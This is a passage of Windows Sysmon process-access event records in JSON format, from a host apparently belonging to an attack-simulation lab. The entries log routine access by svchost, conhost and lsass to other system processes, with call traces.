entReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4378,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4379,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4380,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4381,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4382,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4383,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4384,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4385,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
